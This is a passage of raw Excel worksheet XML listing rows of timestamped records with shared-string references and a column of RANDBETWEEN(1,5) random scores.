      <c r="E3969" s="2" t="s">
        <v>3819</v>
      </c>
      <c r="F3969">
        <f t="shared" ca="1" si="61"/>
        <v>2</v>
      </c>
    </row>
    <row r="3970" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3970" s="1">
        <v>43483.813379629632</v>
      </c>
      <c r="B3970" t="s">
        <v>5</v>
      </c>
      <c r="C3970" t="s">
        <v>10</v>
      </c>
      <c r="D3970" t="s">
        <v>158</v>
      </c>
      <c r="E3970" t="s">
        <v>3824</v>
      </c>
      <c r="F3970">
        <f t="shared" ref="F3970:F4033" ca="1" si="62">RANDBETWEEN(1,5)</f>
        <v>2</v>
      </c>
    </row>
    <row r="3971" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3971" s="1">
        <v>43483.7190625</v>
      </c>
      <c r="B3971" t="s">
        <v>5</v>
      </c>
      <c r="C3971" t="s">
        <v>10</v>
      </c>
      <c r="D3971" t="s">
        <v>52</v>
      </c>
      <c r="E3971" t="s">
        <v>3825</v>
      </c>
      <c r="F3971">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="3972" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3972" s="1">
        <v>43483.697835648149</v>
      </c>
      <c r="B3972" t="s">
        <v>19</v>
      </c>
      <c r="C3972" t="s">
        <v>10</v>
      </c>
      <c r="D3972" t="s">
        <v>6</v>
      </c>
      <c r="E3972" t="s">
        <v>3826</v>
      </c>
      <c r="F3972">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="3973" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3973" s="1">
        <v>43483.669548611113</v>
      </c>
      <c r="B3973" t="s">
        <v>19</v>
      </c>
      <c r="C3973" t="s">
        <v>10</v>
      </c>
      <c r="D3973" t="s">
        <v>112</v>
      </c>
      <c r="E3973" t="s">
        <v>3827</v>
      </c>
      <c r="F3973">
        <f t="shared" ca="1" si="62"/>
        <v>4</v>
      </c>
    </row>
    <row r="3974" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A3974" s="1">
        <v>43483.657812500001</v>
      </c>
      <c r="B3974" t="s">
        <v>1305</v>
      </c>
      <c r="C3974" t="s">
        <v>10</v>
      </c>
      <c r="D3974" t="s">
        <v>158</v>
      </c>
      <c r="E3974" s="2" t="s">
        <v>3828</v>
      </c>
      <c r="F3974">
        <f t="shared" ca="1" si="62"/>
        <v>5</v>
      </c>
    </row>
    <row r="3975" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3975" s="1">
        <v>43483.654652777775</v>
      </c>
      <c r="B3975" t="s">
        <v>5</v>
      </c>
      <c r="C3975" t="s">
        <v>10</v>
      </c>
      <c r="D3975" t="s">
        <v>374</v>
      </c>
      <c r="E3975" t="s">
        <v>3829</v>
      </c>
      <c r="F3975">
        <f t="shared" ca="1" si="62"/>
        <v>4</v>
      </c>
    </row>
    <row r="3976" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3976" s="1">
        <v>43483.6405787037</v>
      </c>
      <c r="B3976" t="s">
        <v>13</v>
      </c>
      <c r="C3976" t="s">
        <v>10</v>
      </c>
      <c r="D3976" t="s">
        <v>112</v>
      </c>
      <c r="E3976" t="s">
        <v>3830</v>
      </c>
      <c r="F3976">
        <f t="shared" ca="1" si="62"/>
        <v>4</v>
      </c>
    </row>
    <row r="3977" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3977" s="1">
        <v>43483.625034722223</v>
      </c>
      <c r="B3977" t="s">
        <v>5</v>
      </c>
      <c r="C3977" t="s">
        <v>10</v>
      </c>
      <c r="D3977" t="s">
        <v>178</v>
      </c>
      <c r="E3977" t="s">
        <v>3831</v>
      </c>
      <c r="F3977">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="3978" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3978" s="1">
        <v>43483.610231481478</v>
      </c>
      <c r="B3978" t="s">
        <v>5</v>
      </c>
      <c r="C3978" t="s">
        <v>10</v>
      </c>
      <c r="D3978" t="s">
        <v>263</v>
      </c>
      <c r="E3978" t="s">
        <v>3832</v>
      </c>
      <c r="F3978">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="3979" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3979" s="1">
        <v>43483.606516203705</v>
      </c>
      <c r="B3979" t="s">
        <v>13</v>
      </c>
      <c r="C3979" t="s">
        <v>10</v>
      </c>
      <c r="D3979" t="s">
        <v>6</v>
      </c>
      <c r="E3979" t="s">
        <v>3833</v>
      </c>
      <c r="F3979">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="3980" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3980" s="1">
        <v>43483.606122685182</v>
      </c>
      <c r="B3980" t="s">
        <v>19</v>
      </c>
      <c r="C3980" t="s">
        <v>10</v>
      </c>
      <c r="D3980" t="s">
        <v>6</v>
      </c>
      <c r="E3980" t="s">
        <v>3834</v>
      </c>
      <c r="F3980">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="3981" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3981" s="1">
        <v>43483.595451388886</v>
      </c>
      <c r="B3981" t="s">
        <v>19</v>
      </c>
      <c r="C3981" t="s">
        <v>10</v>
      </c>
      <c r="D3981" t="s">
        <v>89</v>
      </c>
      <c r="E3981" t="s">
        <v>3835</v>
      </c>
      <c r="F3981">
        <f t="shared" ca="1" si="62"/>
        <v>4</v>
      </c>
    </row>
    <row r="3982" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3982" s="1">
        <v>43483.585451388892</v>
      </c>
      <c r="B3982" t="s">
        <v>13</v>
      </c>
      <c r="C3982" t="s">
        <v>10</v>
      </c>
      <c r="D3982" t="s">
        <v>11</v>
      </c>
      <c r="E3982" t="s">
        <v>3836</v>
      </c>
      <c r="F3982">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="3983" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3983" s="1">
        <v>43483.582835648151</v>
      </c>
      <c r="B3983" t="s">
        <v>5</v>
      </c>
      <c r="C3983" t="s">
        <v>10</v>
      </c>
      <c r="D3983" t="s">
        <v>56</v>
      </c>
      <c r="E3983" t="s">
        <v>3837</v>
      </c>
      <c r="F3983">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="3984" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3984" s="1">
        <v>43483.578668981485</v>
      </c>
      <c r="B3984" t="s">
        <v>5</v>
      </c>
      <c r="C3984" t="s">
        <v>63</v>
      </c>
      <c r="E3984" s="2" t="s">
        <v>3838</v>
      </c>
      <c r="F3984">
        <f t="shared" ca="1" si="62"/>
        <v>5</v>
      </c>
    </row>
    <row r="3985" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3985" s="1">
        <v>43483.487395833334</v>
      </c>
      <c r="B3985" t="s">
        <v>35</v>
      </c>
      <c r="C3985" t="s">
        <v>173</v>
      </c>
      <c r="E3985" s="2" t="s">
        <v>3839</v>
      </c>
      <c r="F3985">
        <f t="shared" ca="1" si="62"/>
        <v>5</v>
      </c>
    </row>
    <row r="3986" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3986" s="1">
        <v>43483.485833333332</v>
      </c>
      <c r="B3986" t="s">
        <v>19</v>
      </c>
      <c r="C3986" t="s">
        <v>10</v>
      </c>
      <c r="D3986" t="s">
        <v>36</v>
      </c>
      <c r="E3986" t="s">
        <v>3840</v>
      </c>
      <c r="F3986">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="3987" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3987" s="1">
        <v>43483.484560185185</v>
      </c>
      <c r="B3987" t="s">
        <v>19</v>
      </c>
      <c r="C3987" t="s">
        <v>10</v>
      </c>
      <c r="D3987" t="s">
        <v>36</v>
      </c>
      <c r="E3987" t="s">
        <v>3841</v>
      </c>
      <c r="F3987">
        <f t="shared" ca="1" si="62"/>
        <v>5</v>
      </c>
    </row>
    <row r="3988" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3988" s="1">
        <v>43483.482615740744</v>
      </c>
      <c r="B3988" t="s">
        <v>19</v>
      </c>
      <c r="C3988" t="s">
        <v>10</v>
      </c>
      <c r="D3988" t="s">
        <v>107</v>
      </c>
      <c r="E3988" t="s">
        <v>3842</v>
      </c>
      <c r="F3988">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="3989" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A3989" s="1">
        <v>43483.468726851854</v>
      </c>
      <c r="B3989" t="s">
        <v>5</v>
      </c>
      <c r="C3989" t="s">
        <v>6</v>
      </c>
      <c r="D3989" t="s">
        <v>25</v>
      </c>
      <c r="E3989" s="2" t="s">
        <v>3843</v>
      </c>
      <c r="F3989">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="3990" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3990" s="1">
        <v>43483.46197916667</v>
      </c>
      <c r="B3990" t="s">
        <v>1305</v>
      </c>
      <c r="C3990" t="s">
        <v>6</v>
      </c>
      <c r="D3990" t="s">
        <v>67</v>
      </c>
      <c r="E3990" s="2" t="s">
        <v>3844</v>
      </c>
      <c r="F3990">
        <f t="shared" ca="1" si="62"/>
        <v>4</v>
      </c>
    </row>
    <row r="3991" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A3991" s="1">
        <v>43483.461967592593</v>
      </c>
      <c r="B3991" t="s">
        <v>1305</v>
      </c>
      <c r="C3991" t="s">
        <v>6</v>
      </c>
      <c r="D3991" t="s">
        <v>67</v>
      </c>
      <c r="E3991" s="2" t="s">
        <v>3844</v>
      </c>
      <c r="F3991">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="3992" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3992" s="1">
        <v>43483.456331018519</v>
      </c>
      <c r="B3992" t="s">
        <v>19</v>
      </c>
      <c r="C3992" t="s">
        <v>10</v>
      </c>
      <c r="D3992" t="s">
        <v>713</v>
      </c>
      <c r="E3992" t="s">
        <v>3845</v>
      </c>
      <c r="F3992">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="3993" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3993" s="1">
        <v>43483.439849537041</v>
      </c>
      <c r="B3993" t="s">
        <v>5</v>
      </c>
      <c r="C3993" t="s">
        <v>50</v>
      </c>
      <c r="E3993" t="s">
        <v>3846</v>
      </c>
      <c r="F3993">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="3994" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A3994" s="1">
        <v>43483.438958333332</v>
      </c>
      <c r="B3994" t="s">
        <v>5</v>
      </c>
      <c r="C3994" t="s">
        <v>48</v>
      </c>
      <c r="E3994" s="2" t="s">
        <v>3847</v>
      </c>
      <c r="F3994">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="3995" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A3995" s="1">
        <v>43483.423368055555</v>
      </c>
      <c r="B3995" t="s">
        <v>19</v>
      </c>
      <c r="C3995" t="s">
        <v>535</v>
      </c>
      <c r="E3995" s="2" t="s">
        <v>3848</v>
      </c>
      <c r="F3995">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="3996" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3996" s="1">
        <v>43483.414270833331</v>
      </c>
      <c r="B3996" t="s">
        <v>5</v>
      </c>
      <c r="C3996" t="s">
        <v>189</v>
      </c>
      <c r="E3996" t="s">
        <v>3849</v>
      </c>
      <c r="F3996">
        <f t="shared" ca="1" si="62"/>
        <v>5</v>
      </c>
    </row>
    <row r="3997" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3997" s="1">
        <v>43483.398344907408</v>
      </c>
      <c r="B3997" t="s">
        <v>1305</v>
      </c>
      <c r="C3997" t="s">
        <v>60</v>
      </c>
      <c r="E3997">
        <v>632667073</v>
      </c>
      <c r="F3997">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="3998" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3998" s="1">
        <v>43483.388738425929</v>
      </c>
      <c r="B3998" t="s">
        <v>19</v>
      </c>
      <c r="C3998" t="s">
        <v>454</v>
      </c>
      <c r="E3998" t="s">
        <v>3850</v>
      </c>
      <c r="F3998">
        <f t="shared" ca="1" si="62"/>
        <v>5</v>
      </c>
    </row>
    <row r="3999" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A3999" s="1">
        <v>43483.339907407404</v>
      </c>
      <c r="B3999" t="s">
        <v>5</v>
      </c>
      <c r="C3999" t="s">
        <v>10</v>
      </c>
      <c r="D3999" t="s">
        <v>263</v>
      </c>
      <c r="E3999" t="s">
        <v>3851</v>
      </c>
      <c r="F3999">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="4000" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4000" s="1">
        <v>43483.32880787037</v>
      </c>
      <c r="B4000" t="s">
        <v>13</v>
      </c>
      <c r="C4000" t="s">
        <v>10</v>
      </c>
      <c r="D4000" t="s">
        <v>41</v>
      </c>
      <c r="E4000" t="s">
        <v>3852</v>
      </c>
      <c r="F4000">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="4001" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4001" s="1">
        <v>43483.323437500003</v>
      </c>
      <c r="B4001" t="s">
        <v>5</v>
      </c>
      <c r="C4001" t="s">
        <v>189</v>
      </c>
      <c r="E4001" t="s">
        <v>3853</v>
      </c>
      <c r="F4001">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="4002" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4002" s="1">
        <v>43483.288611111115</v>
      </c>
      <c r="B4002" t="s">
        <v>5</v>
      </c>
      <c r="C4002" t="s">
        <v>222</v>
      </c>
      <c r="E4002" s="2" t="s">
        <v>3854</v>
      </c>
      <c r="F4002">
        <f t="shared" ca="1" si="62"/>
        <v>4</v>
      </c>
    </row>
    <row r="4003" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4003" s="1">
        <v>43483.281539351854</v>
      </c>
      <c r="B4003" t="s">
        <v>35</v>
      </c>
      <c r="C4003" t="s">
        <v>189</v>
      </c>
      <c r="E4003" s="2" t="s">
        <v>3855</v>
      </c>
      <c r="F4003">
        <f t="shared" ca="1" si="62"/>
        <v>4</v>
      </c>
    </row>
    <row r="4004" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4004" s="1">
        <v>43483.279143518521</v>
      </c>
      <c r="B4004" t="s">
        <v>13</v>
      </c>
      <c r="C4004" t="s">
        <v>60</v>
      </c>
      <c r="E4004" t="s">
        <v>3856</v>
      </c>
      <c r="F4004">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="4005" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4005" s="1">
        <v>43483.279131944444</v>
      </c>
      <c r="B4005" t="s">
        <v>13</v>
      </c>
      <c r="C4005" t="s">
        <v>60</v>
      </c>
      <c r="E4005" t="s">
        <v>3856</v>
      </c>
      <c r="F4005">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="4006" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4006" s="1">
        <v>43483.279120370367</v>
      </c>
      <c r="B4006" t="s">
        <v>13</v>
      </c>
      <c r="C4006" t="s">
        <v>60</v>
      </c>
      <c r="E4006" t="s">
        <v>3856</v>
      </c>
      <c r="F4006">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="4007" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4007" s="1">
        <v>43483.275983796295</v>
      </c>
      <c r="B4007" t="s">
        <v>35</v>
      </c>
      <c r="C4007" t="s">
        <v>454</v>
      </c>
      <c r="E4007" s="2" t="s">
        <v>3857</v>
      </c>
      <c r="F4007">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="4008" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4008" s="1">
        <v>43483.218935185185</v>
      </c>
      <c r="B4008" t="s">
        <v>19</v>
      </c>
      <c r="C4008" t="s">
        <v>226</v>
      </c>
      <c r="E4008" t="s">
        <v>828</v>
      </c>
      <c r="F4008">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="4009" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4009" s="1">
        <v>43483.215821759259</v>
      </c>
      <c r="B4009" t="s">
        <v>19</v>
      </c>
      <c r="C4009" t="s">
        <v>2108</v>
      </c>
      <c r="E4009" t="s">
        <v>3858</v>
      </c>
      <c r="F4009">
        <f t="shared" ca="1" si="62"/>
        <v>5</v>
      </c>
    </row>
    <row r="4010" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4010" s="1">
        <v>43483.212222222224</v>
      </c>
      <c r="B4010" t="s">
        <v>19</v>
      </c>
      <c r="C4010" t="s">
        <v>229</v>
      </c>
      <c r="F4010">
        <f t="shared" ca="1" si="62"/>
        <v>4</v>
      </c>
    </row>
    <row r="4011" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4011" s="1">
        <v>43483.171643518515</v>
      </c>
      <c r="B4011" t="s">
        <v>13</v>
      </c>
      <c r="C4011" t="s">
        <v>65</v>
      </c>
      <c r="E4011" s="2" t="s">
        <v>3859</v>
      </c>
      <c r="F4011">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="4012" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4012" s="1">
        <v>43483.167743055557</v>
      </c>
      <c r="B4012" t="s">
        <v>5</v>
      </c>
      <c r="C4012" t="s">
        <v>2108</v>
      </c>
      <c r="E4012" t="s">
        <v>3860</v>
      </c>
      <c r="F4012">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="4013" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4013" s="1">
        <v>43483.14702546296</v>
      </c>
      <c r="B4013" t="s">
        <v>19</v>
      </c>
      <c r="C4013" t="s">
        <v>454</v>
      </c>
      <c r="E4013" t="s">
        <v>3861</v>
      </c>
      <c r="F4013">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="4014" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4014" s="1">
        <v>43483.111180555556</v>
      </c>
      <c r="B4014" t="s">
        <v>19</v>
      </c>
      <c r="C4014" t="s">
        <v>2108</v>
      </c>
      <c r="E4014" t="s">
        <v>3862</v>
      </c>
      <c r="F4014">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="4015" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A4015" s="1">
        <v>43483.087916666664</v>
      </c>
      <c r="B4015" t="s">
        <v>5</v>
      </c>
      <c r="C4015" t="s">
        <v>41</v>
      </c>
      <c r="E4015" s="2" t="s">
        <v>3863</v>
      </c>
      <c r="F4015">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="4016" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4016" s="1">
        <v>43483.03806712963</v>
      </c>
      <c r="B4016" t="s">
        <v>19</v>
      </c>
      <c r="C4016" t="s">
        <v>60</v>
      </c>
      <c r="E4016" t="s">
        <v>3864</v>
      </c>
      <c r="F4016">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="4017" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4017" s="1">
        <v>43483.034131944441</v>
      </c>
      <c r="B4017" t="s">
        <v>19</v>
      </c>
      <c r="C4017" t="s">
        <v>60</v>
      </c>
      <c r="E4017" t="s">
        <v>3865</v>
      </c>
      <c r="F4017">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="4018" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A4018" s="1">
        <v>43483.014293981483</v>
      </c>
      <c r="B4018" t="s">
        <v>5</v>
      </c>
      <c r="C4018" t="s">
        <v>41</v>
      </c>
      <c r="E4018" s="2" t="s">
        <v>3866</v>
      </c>
      <c r="F4018">
        <f t="shared" ca="1" si="62"/>
        <v>5</v>
      </c>
    </row>
    <row r="4019" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4019" s="1">
        <v>43482.971875000003</v>
      </c>
      <c r="B4019" t="s">
        <v>5</v>
      </c>
      <c r="C4019" t="s">
        <v>41</v>
      </c>
      <c r="E4019" t="s">
        <v>3867</v>
      </c>
      <c r="F4019">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="4020" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4020" s="1">
        <v>43482.914837962962</v>
      </c>
      <c r="B4020" t="s">
        <v>19</v>
      </c>
      <c r="C4020" t="s">
        <v>10</v>
      </c>
      <c r="D4020" t="s">
        <v>36</v>
      </c>
      <c r="E4020" t="s">
        <v>3868</v>
      </c>
      <c r="F4020">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="4021" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4021" s="1">
        <v>43482.886770833335</v>
      </c>
      <c r="B4021" t="s">
        <v>19</v>
      </c>
      <c r="C4021" t="s">
        <v>2108</v>
      </c>
      <c r="E4021" t="s">
        <v>616</v>
      </c>
      <c r="F4021">
        <f t="shared" ca="1" si="62"/>
        <v>5</v>
      </c>
    </row>
    <row r="4022" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4022" s="1">
        <v>43482.861817129633</v>
      </c>
      <c r="B4022" t="s">
        <v>19</v>
      </c>
      <c r="C4022" t="s">
        <v>71</v>
      </c>
      <c r="E4022" s="2" t="s">
        <v>3869</v>
      </c>
      <c r="F4022">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="4023" spans="1:6" ht="180" x14ac:dyDescent="0.25">
      <c r="A4023" s="1">
        <v>43482.860729166663</v>
      </c>
      <c r="B4023" t="s">
        <v>5</v>
      </c>
      <c r="C4023" t="s">
        <v>253</v>
      </c>
      <c r="E4023" s="2" t="s">
        <v>3870</v>
      </c>
      <c r="F4023">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="4024" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4024" s="1">
        <v>43482.850624999999</v>
      </c>
      <c r="B4024" t="s">
        <v>35</v>
      </c>
      <c r="C4024" t="s">
        <v>2108</v>
      </c>
      <c r="E4024" t="s">
        <v>616</v>
      </c>
      <c r="F4024">
        <f t="shared" ca="1" si="62"/>
        <v>4</v>
      </c>
    </row>
    <row r="4025" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4025" s="1">
        <v>43482.849351851852</v>
      </c>
      <c r="B4025" t="s">
        <v>35</v>
      </c>
      <c r="C4025" t="s">
        <v>2745</v>
      </c>
      <c r="E4025" t="s">
        <v>3593</v>
      </c>
      <c r="F4025">
        <f t="shared" ca="1" si="62"/>
        <v>4</v>
      </c>
    </row>
    <row r="4026" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4026" s="1">
        <v>43482.847627314812</v>
      </c>
      <c r="B4026" t="s">
        <v>5</v>
      </c>
      <c r="C4026" t="s">
        <v>29</v>
      </c>
      <c r="E4026" t="s">
        <v>3871</v>
      </c>
      <c r="F4026">
        <f t="shared" ca="1" si="62"/>
        <v>5</v>
      </c>
    </row>
    <row r="4027" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4027" s="1">
        <v>43482.776412037034</v>
      </c>
      <c r="B4027" t="s">
        <v>5</v>
      </c>
      <c r="C4027" t="s">
        <v>10</v>
      </c>
      <c r="D4027" t="s">
        <v>80</v>
      </c>
      <c r="E4027" t="s">
        <v>3872</v>
      </c>
      <c r="F4027">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="4028" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4028" s="1">
        <v>43482.776145833333</v>
      </c>
      <c r="B4028" t="s">
        <v>5</v>
      </c>
      <c r="C4028" t="s">
        <v>10</v>
      </c>
      <c r="D4028" t="s">
        <v>36</v>
      </c>
      <c r="E4028" t="s">
        <v>3873</v>
      </c>
      <c r="F4028">
        <f t="shared" ca="1" si="62"/>
        <v>2</v>
      </c>
    </row>
    <row r="4029" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A4029" s="1">
        <v>43482.771053240744</v>
      </c>
      <c r="B4029" t="s">
        <v>19</v>
      </c>
      <c r="C4029" t="s">
        <v>10</v>
      </c>
      <c r="D4029" t="s">
        <v>494</v>
      </c>
      <c r="E4029" s="2" t="s">
        <v>3874</v>
      </c>
      <c r="F4029">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="4030" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4030" s="1">
        <v>43482.732627314814</v>
      </c>
      <c r="B4030" t="s">
        <v>13</v>
      </c>
      <c r="C4030" t="s">
        <v>10</v>
      </c>
      <c r="D4030" t="s">
        <v>52</v>
      </c>
      <c r="E4030" t="s">
        <v>3875</v>
      </c>
      <c r="F4030">
        <f t="shared" ca="1" si="62"/>
        <v>5</v>
      </c>
    </row>
    <row r="4031" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4031" s="1">
        <v>43482.715891203705</v>
      </c>
      <c r="B4031" t="s">
        <v>5</v>
      </c>
      <c r="C4031" t="s">
        <v>10</v>
      </c>
      <c r="D4031" t="s">
        <v>163</v>
      </c>
      <c r="E4031" t="s">
        <v>3876</v>
      </c>
      <c r="F4031">
        <f t="shared" ca="1" si="62"/>
        <v>4</v>
      </c>
    </row>
    <row r="4032" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4032" s="1">
        <v>43482.715208333335</v>
      </c>
      <c r="B4032" t="s">
        <v>5</v>
      </c>
      <c r="C4032" t="s">
        <v>10</v>
      </c>
      <c r="D4032" t="s">
        <v>52</v>
      </c>
      <c r="E4032" t="s">
        <v>3877</v>
      </c>
      <c r="F4032">
        <f t="shared" ca="1" si="62"/>
        <v>1</v>
      </c>
    </row>
    <row r="4033" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A4033" s="1">
        <v>43482.682986111111</v>
      </c>
      <c r="B4033" t="s">
        <v>35</v>
      </c>
      <c r="C4033" t="s">
        <v>6</v>
      </c>
      <c r="D4033" t="s">
        <v>25</v>
      </c>
      <c r="E4033" s="2" t="s">
        <v>3878</v>
      </c>
      <c r="F4033">
        <f t="shared" ca="1" si="62"/>
        <v>3</v>
      </c>
    </row>
    <row r="4034" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4034" s="1">
        <v>43482.657418981478</v>
      </c>
      <c r="B4034" t="s">
        <v>35</v>
      </c>
      <c r="C4034" t="s">
        <v>10</v>
      </c>
      <c r="D4034" t="s">
        <v>52</v>
      </c>
      <c r="E4034" t="s">
        <v>3879</v>
      </c>
      <c r="F4034">
        <f t="shared" ref="F4034:F4097" ca="1" si="63">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4035" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A4035" s="1">
        <v>43482.631736111114</v>
      </c>
      <c r="B4035" t="s">
        <v>5</v>
      </c>
      <c r="C4035" t="s">
        <v>6</v>
      </c>
      <c r="D4035" t="s">
        <v>25</v>
      </c>
      <c r="E4035" s="2" t="s">
        <v>3880</v>
      </c>
      <c r="F4035">
        <f t="shared" ca="1" si="63"/>
        <v>5</v>
      </c>
    </row>
    <row r="4036" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4036" s="1">
        <v>43482.624039351853</v>
      </c>
      <c r="B4036" t="s">
        <v>35</v>
      </c>
      <c r="C4036" t="s">
        <v>10</v>
      </c>
      <c r="D4036" t="s">
        <v>6</v>
      </c>
      <c r="E4036" s="2" t="s">
        <v>3881</v>
      </c>
      <c r="F4036">
        <f t="shared" ca="1" si="63"/>
        <v>1</v>
      </c>
    </row>
    <row r="4037" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A4037" s="1">
        <v>43482.618310185186</v>
      </c>
      <c r="B4037" t="s">
        <v>13</v>
      </c>
      <c r="C4037" t="s">
        <v>10</v>
      </c>
      <c r="D4037" t="s">
        <v>89</v>
      </c>
      <c r="F4037">
        <f t="shared" ca="1" si="63"/>
        <v>3</v>
      </c>
    </row>
    <row r="4038" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A4038" s="1">
        <v>43482.614791666667</v>
      </c>
      <c r="B4038" t="s">
        <v>13</v>
      </c>
      <c r="C4038" t="s">
        <v>48</v>
      </c>
      <c r="E4038" s="2" t="s">
        <v>3882</v>
      </c>
      <c r="F4038">
        <f t="shared" ca="1" si="63"/>
        <v>4</v>
      </c>
    </row>
